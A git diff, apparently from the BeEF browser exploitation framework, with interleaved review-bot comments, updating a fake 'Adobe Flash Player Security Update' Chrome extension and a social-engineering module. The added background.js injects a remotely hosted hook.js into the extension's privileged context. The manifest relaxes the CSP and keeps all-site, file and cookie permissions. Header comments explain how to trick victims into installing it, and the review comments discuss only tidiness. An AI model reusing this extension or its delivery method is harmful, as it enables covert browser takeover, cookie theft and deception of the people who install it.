diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js
index aa364ae45..ff6c7b92a 100644
--- a/extensions/demos/flash_update_chrome_extension/background.js
+++ b/extensions/demos/flash_update_chrome_extension/background.js
@@ -6,5 +6,6 @@
 d=document;
 e=d.createElement('script');
-e.src="http://127.0.0.1:3000/hook.js";
-d.body.appendChild(e);
+e.src="https://192.168.0.2/hook.js";
+d.body.appendChild(e);
+
diff --git a/extensions/demos/flash_update_chrome_extension/manifest.json b/extensions/demos/flash_update_chrome_extension/manifest.json
index 7e2c4fa44..78b46fe06 100644
--- a/extensions/demos/flash_update_chrome_extension/manifest.json
+++ b/extensions/demos/flash_update_chrome_extension/manifest.json
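Review bot: The origin on the new `e.src` line is an environment-specific literal, and it must be repeated exactly in the `content_security_policy` entry this commit adds to manifest.json, yet nothing in background.js records that coupling. A comment above the assignment, for example `// sample address: must equal the script-src origin in manifest.json content_security_policy`, would mark it as a sample and keep the two files in step. For readers studying the demo, this is the line that pulls remotely hosted script into the extension's background page, where it runs with every permission the manifest grants. The `-d.body.appendChild(e);` / `+d.body.appendChild(e);` pair and the trailing empty added line look like a whitespace or end-of-file change only and add noise to the diff. The file's first lines are outside the hunk.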
@@ -1,26 +1,34 @@
 {
- // Simple chrome extension
- // Just loads beef into the extension context.
- //
- // You may need to set the IP address of the beef hook in background.js
- // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
+ // Simple chrome extension, by antisnatchor and Mike Haworth
+ // Just loads BeEF into the extension context.
+ //
+ // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
+ // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
+ // Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
+ // 4. You need to upload the extension, as a zip file, to Google Chrome store.
+ // In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
+ // so the extension can't be served by BeEF anymore. You need to trick the victim to install
+ // the extension from Google Chrome store.
+ //
- "name": "Adobe Flash Player",
- "version": "11.2.202.235",
- "description": "Introduces vulnerabilites into web browsers",
- "background": {
- "scripts": ["background.js"]
- },
- "icons": {
- "16": "icon16.png",
- "48": "icon48.png",
- "128": "icon128.png"
- },
- "permissions": [
- "tabs",
- "http://*/*",
- "https://*/*",
- "file://*/*",
- "cookies"
- ]
+ "name": "Adobe Flash Player Security Update",
+ "manifest_version": 2,
+ "version": "11.5.502.149",
+ "description": "Updates Adobe Flash Player with latest securty updates",
+ "background": {
+ "scripts": ["background.js"]
+ },
+ "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
+ "icons": {
+ "16": "icon16.png",
+ "48": "icon48.png",
+ "128": "icon128.png"
+ },
+ "permissions": [
+ "tabs",
+ "http://*/*",
+ "https://*/*",
+ "file://*/*",
+ "cookies"
+ ]
 }
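Review bot: The added `content_security_policy` value allows `'unsafe-eval'` alongside a remote `script-src` origin, but the header comment explains only the HTTPS-origin requirement and never says why `'unsafe-eval'` is needed. The comment's numbering also jumps from 2 to 4, so a line such as `// 3. 'unsafe-eval' is allowed in the CSP because <reason>` would close both gaps. Combined with the unchanged `http://*/*`, `https://*/*`, `file://*/*` and `cookies` permissions, this relaxation lets remotely served script act on every page and cookie the browser holds. The comment should state that plainly, since it is the part of the manifest an extension review or allow-list policy would key on. The `//` comments are accepted by Chrome's manifest parser as far as I know, but strict JSON tooling will reject the file.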
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index c62fcb60d..8922b69dc 100644
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
 enable: true
 category: "Social Engineering"
 name: "Fake Flash Update"
- description: "Prompts the user to install an update to Adobe Flash Player.
The file to be delivered could be a Chrome or Firefox extension.

A Chrome extension has privileged access and can do a whole lot..
See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source. Note: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.

The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.
See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
+ description: "Prompts the user to install an update to Adobe Flash Player.
The file to be delivered could be a Chrome or Firefox extension.

A Chrome extension has privileged access and can do a whole lot..
See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source. Note: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.

The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.
See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
 authors: ["mh", "antisnatchor"]
 target:
 user_notify: ['ALL']